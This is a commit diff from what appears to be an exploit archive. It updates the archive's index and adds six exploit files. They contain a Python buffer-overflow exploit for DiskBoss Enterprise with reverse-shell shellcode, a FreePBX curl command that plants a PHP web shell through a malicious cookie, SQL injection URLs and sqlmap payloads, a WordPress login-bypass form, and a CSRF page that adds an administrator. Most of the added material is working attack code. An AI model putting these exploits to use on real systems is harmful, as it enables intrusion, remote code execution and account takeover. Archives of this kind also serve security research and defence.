DB: 2017-01-11

6 new exploits DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH) ClaSS 0.8.60 - (export.php ftype) Local File Inclusion ClaSS 0.8.60 - 'export.php' Local File Inclusion Miniweb 2.0 - SQL Injection (Authentication Bypass) Miniweb 2.0 - Authentication Bypass eDNews 2.0 - (lg) Local File Inclusion eDContainer 2.22 - (lg) Local File Inclusion eDNews 2.0 - Local File Inclusion eDContainer 2.22 - Local File Inclusion Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection Ultimate PHP Board 2.2.1 - Privilege Escalation Sepcity Shopping Mall - SQL Injection Sepcity Lawyer Portal - SQL Injection Sepcity Classified - 'classdis.asp ID' SQL Injection FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection Flexphplink 0.0.x - (Authentication Bypass) SQL Injection eDNews 2.0 - (eDNews_view.php newsid) SQL Injection Sepcity Classified - 'ID' Parameter SQL Injection FlexPHPDirectory 0.0.1 - Authentication Bypass Flexphpsite 0.0.1 - Authentication Bypass Flexphplink 0.0.x - Authentication Bypass eDNews 2.0 - SQL Injection PHPAlumni - 'Acomment.php id' SQL Injection PHPAlumni - SQL Injection Flexphpic 0.0.x - (Authentication Bypass) SQL Injection Flexphpic 0.0.x - Authentication Bypass Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection Mole Group Vacation Estate Listing Script - Blind SQL Injection Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass) Friends in War Make or Break 1.3 - Authentication Bypass My Php Dating 2.0 - 'path' Parameter SQL Injection My Php Dating 2.0 - 'id' Parameter SQL Injection My PHP Dating 2.0 - 'path' Parameter SQL Injection My PHP Dating 2.0 - 'id' Parameter SQL Injection Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection Starting Page 1.3 - SQL Injection Freepbx < 2.11.1.5 - Remote Code Execution WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)
2017-01-11 05:01:17 +00:00 · 2017-01-11 05:01:17 +00:00 · 1b13c8a790
commit 1b13c8a790
parent 574c0f2df8
7 changed files with 247 additions and 18 deletions
--- a/files.csv
+++ b/files.csv
@ -15204,6 +15204,7 @@ id,file,description,date,author,platform,type,port
 40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
 40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
 40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
+41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -20356,9 +20357,9 @@ id,file,description,date,author,platform,type,port
 7574,platforms/php/webapps/7574.txt,"Joomla! Component mDigg 2.2.8 - 'category' Parameter SQL Injection",2008-12-24,boom3rang,php,webapps,0
 7575,platforms/php/webapps/7575.pl,"Joomla! Component 5starhotels - SQL Injection",2008-12-24,EcHoLL,php,webapps,0
 7576,platforms/php/webapps/7576.pl,"PHP-Fusion 7.0.2 - Blind SQL Injection",2008-12-24,StAkeR,php,webapps,0
-7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0
+7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - 'export.php' Local File Inclusion",2008-12-24,fuzion,php,webapps,0
 7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - 'lang' Local File Inclusion",2008-12-24,fuzion,php,webapps,0
-7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - SQL Injection (Authentication Bypass)",2008-12-28,bizzit,php,webapps,0
+7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - Authentication Bypass",2008-12-28,bizzit,php,webapps,0
 7587,platforms/php/webapps/7587.txt,"Joomla! Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps,0
 7593,platforms/php/webapps/7593.pl,"DeluxeBB 1.2 - Blind SQL Injection",2008-12-28,StAkeR,php,webapps,0
 7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Authentication Bypass",2008-12-28,k3yv4n,php,webapps,0
@ -20369,26 +20370,26 @@ id,file,description,date,author,platform,type,port
 7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps,0
 7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0
 7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Authentication Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0
-7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
-7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
+7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
+7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
 7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps,0
 7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 - Authentication Bypass Change User Password",2008-12-29,R31P0l,php,webapps,0
-7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation",2008-12-29,StAkeR,php,webapps,0
-7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
-7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
+7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - Privilege Escalation",2008-12-29,StAkeR,php,webapps,0
+7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
+7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
 7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection",2008-12-29,s4avrd0w,php,webapps,0
 7612,platforms/php/webapps/7612.txt,"Joomla! Component com_na_content 1.0 - Blind SQL Injection",2008-12-29,"Mehmet Ince",php,webapps,0
-7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'classdis.asp ID' SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0
-7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
-7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
-7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
-7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - (eDNews_view.php newsid) SQL Injection",2008-12-29,"Virangar Security",php,webapps,0
+7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'ID' Parameter SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0
+7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0
+7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0
+7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - Authentication Bypass",2008-12-29,x0r,php,webapps,0
+7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - SQL Injection",2008-12-29,"Virangar Security",php,webapps,0
 7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,php,webapps,0
-7621,platforms/php/webapps/7621.txt,"PHPAlumni - 'Acomment.php id' SQL Injection",2008-12-29,Mr.SQL,php,webapps,0
+7621,platforms/php/webapps/7621.txt,"PHPAlumni - SQL Injection",2008-12-29,Mr.SQL,php,webapps,0
 7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0
-7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - (Authentication Bypass) SQL Injection",2008-12-30,S.W.A.T.,php,webapps,0
+7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - Authentication Bypass",2008-12-30,S.W.A.T.,php,webapps,0
 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0
-7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0
+7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,php,webapps,0
 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0
 7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0
@ -26240,7 +26241,7 @@ id,file,description,date,author,platform,type,port
 22730,platforms/asp/webapps/22730.txt,"Mailtraq 2.2 - Browse.asp Cross-Site Scripting",2003-06-04,"Ziv Kamir",asp,webapps,0
 22731,platforms/asp/webapps/22731.txt,"Mailtraq 2.2 - Webmail Utility Full Path Disclosure",2003-06-04,"Ziv Kamir",asp,webapps,0
 22735,platforms/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0
-22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass)",2012-11-15,d3b4g,php,webapps,0
+22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - Authentication Bypass",2012-11-15,d3b4g,php,webapps,0
 22741,platforms/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps,0
 22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,cr4wl3r,php,webapps,0
 22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0
@ -36941,5 +36942,10 @@ id,file,description,date,author,platform,type,port
 40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
 40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
 40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0
-40999,platforms/php/webapps/40999.txt,"My Php Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
-41001,platforms/php/webapps/41001.txt,"My Php Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
+40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
+41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
+41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection",2017-01-09,v3n0m,php,webapps,0
+41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - SQL Injection",2017-01-10,JaMbA,php,webapps,0
+41005,platforms/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps,0
+41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
+41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0
--- a/platforms/php/webapps/41002.txt
+++ b/platforms/php/webapps/41002.txt
@ -0,0 +1,42 @@
+# Exploit 	: Make or Break 1.7 (imgid) SQL Injection Vulnerability
+# Author	: v3n0m
+# Contact	: v3n0m[at]outlook[dot]com
+# Date		: January, 09-2017 GMT +7:00 Jakarta, Indonesia
+# Software	: Make or Break
+# Version	: 1.7 Lower versions may also be affected
+# License	: Free
+# Download	: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
+# Credits	: YOGYACARDERLINK, Dhea Fathin Karima & YOU !!
+
+1. Description
+
+An attacker can exploit this vulnerability to read from the database.
+The parameter 'imgid' is vulnerable.
+
+
+2. Proof of Concept
+
+http://domain.tld/[path]/index.php?imgid=-9999+union+all+select+null,null,null,null,version(),null--
+
+# Exploitation via SQLMap
+
+Parameter: imgid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: imgid=1 AND 4688=4688
+    Vector: AND [INFERENCE]
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind
+    Payload: imgid=1 OR SLEEP(2)
+    Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 11 columns
+    Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176786271,0x746264586d76465246657a5778446f756c6d696859494e7247735476506447726470676f4e544c59,0x71706b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WQyQ
+    Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]
+
+
+3. Security Risk
+
+The security risk of the remote sql-injection web vulnerability in the Make or Break CMS is estimated as high.
--- a/platforms/php/webapps/41004.txt
+++ b/platforms/php/webapps/41004.txt
@ -0,0 +1,22 @@
+# Vulnerability: Starting Page- SQL Injection
+
+# Date: 10.01.2017
+
+# Vendor Homepage: http://software.friendsinwar.com/
+
+# Tested on: win10
+
+# Author: JaMbA
+
+# Script link: http://software.friendsinwar.com/news.php?readmore=31
+
+#########################
+
+
+# SQL Injection/Exploit :
+
+# Vulnerable Parametre : linkid
+
+# http://localhost/[PATH]/outgoing.php?linkid=[SQL]
+
+Tunisia 4 ever
--- a/platforms/php/webapps/41005.txt
+++ b/platforms/php/webapps/41005.txt
@ -0,0 +1,37 @@
+Exploit Title: Freepbx coockie recordings injection
+Google Dork: Ask Santa
+Date: 23/12/2016
+Exploit Author: inj3ctor3
+Vendor Homepage: https://www.freepbx.org/
+Software Link: ISO LINKS IN SITE https://www.freepbx.org/
+Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/)
+Tested on: Centos 6
+CVE : CVE-2014-7235
+
+1. Description
+
+a critical Zero-Day Remote Code Execution and Privilege Escalation 
+exploit within the legacy “FreePBX ARI Framework module/Asterisk 
+Recording Interface (ARI)”.
+htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x, 
+and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth coockie, 
+related to the PHP unserialize function
+
+<?php
+.....
+...
+line 56 $buf = unserialize(stripslashes($_COOKIE['ari_auth']));
+ line 57 list($data,$chksum) = $buf;
+....
+?>
+
+A successful attack may compromise the whole system aiding the hacker to gain
+
+further privileges via taking advantage of famous nmap shell 
+
+without further or do this is a poc code
+
+curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "<?php if(\$_COOKIE[\"lang\"]) {system(\$_COOKIE[\"lang\"]);}die();?>");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null
+
+if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi
+ 
--- a/platforms/php/webapps/41006.txt
+++ b/platforms/php/webapps/41006.txt
@ -0,0 +1,24 @@
+# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
+# Date: 10-01-2017
+# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: web
+ 
+1. Description
+
+You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
+
+http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html
+
+2. Proof of Concept
+
+<form method="post" action="http://wp/wp-admin/admin-ajax.php">
+	Username: <input type="text" name="username" value="administrator">
+	<input type="hidden" name="email" value="sth">
+	<input type="hidden" name="action" value="loginGuestFacebook">
+	<input type="submit" value="Login">
+</form>
+
+Then you can go to admin panel.
--- a/platforms/php/webapps/41007.html
+++ b/platforms/php/webapps/41007.html
@ -0,0 +1,32 @@
+# # # # # 
+# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
+# Google Dork: FMyLife Clone Script
+# Date:10.01.2017
+# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
+# Tested on: http://www.tellaboutit.com/admin/
+# Script Name: FMyLife Clone Script (Pro Edition)
+# Script Version: 1.1
+# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/   
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # # 
+#Exploit :
+<html>
+<body>
+<h2>Add an Administrator</h2>
+<form action="http://localhost/[PATH]/admin/" method="post">
+ <div id="add-admin-form">
+  <input type="hidden" name="action" value="add-admin" />
+  <label for="username">Username:</label>
+  <input type="text" id="username" name="admin-username" value="" />
+  <div class="spacer"></div>
+  <label for="password">Password:</label>
+  <input type="password" id="password" name="admin-password" value="" />
+  <div class="spacer"></div>
+  <input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
+ </div>
+</form>
+</body>
+</html>
+# # # # # 
--- a/platforms/windows/remote/41003.py
+++ b/platforms/windows/remote/41003.py
@ -0,0 +1,66 @@
+#!/usr/bin/python
+ 
+# Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow
+# Date: 10-01-2017
+# Exploit Author: Wyndell Bibera
+# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe
+# Version: 7.5.12
+# Tested on: Windows XP Professional SP3
+
+import socket
+
+ip = "192.168.86.150"
+port = 80
+ 
+egg = "ezggezgg"
+nopslide = "\x90" * 8
+
+# Bad characters: \x00\x09\x0a\x0d\x20
+# Reverse Shell @ Port 443 - Change shellcode section accordingly
+shellcode = ("\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
+"\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41"
+"\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5"
+"\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f"
+"\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41"
+"\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70"
+"\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8"
+"\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82"
+"\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b"
+"\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86"
+"\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86"
+"\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d"
+"\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80"
+"\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7"
+"\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c"
+"\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92"
+"\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c"
+"\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02"
+"\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1"
+"\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1"
+"\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc"
+"\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a"
+"\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1"
+"\x7e\x97\x50\x56\x7e\xb2")
+scpad = "\x90" * (2480 - len(shellcode) - len(nopslide))
+shortjmp = "\xeb\x0f\x90\x90"
+
+# Search for string 'ezgg' twice
+egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+
+extra = "\x90" * 9
+pad = "\x90" * (5000 - len(extra) - 2496 - len(egghunter))
+
+# POP POP RET Instruction
+seh = "\x6b\xa6\x02\x10" 
+
+buffer = (
+"POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1\r\n"
+"Host: :192.168.86.150\r\n"
+"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
+"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*    ;q=0.8\r\n\r\n")
+ 
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((ip, port))
+s.send(buffer)
+s.close()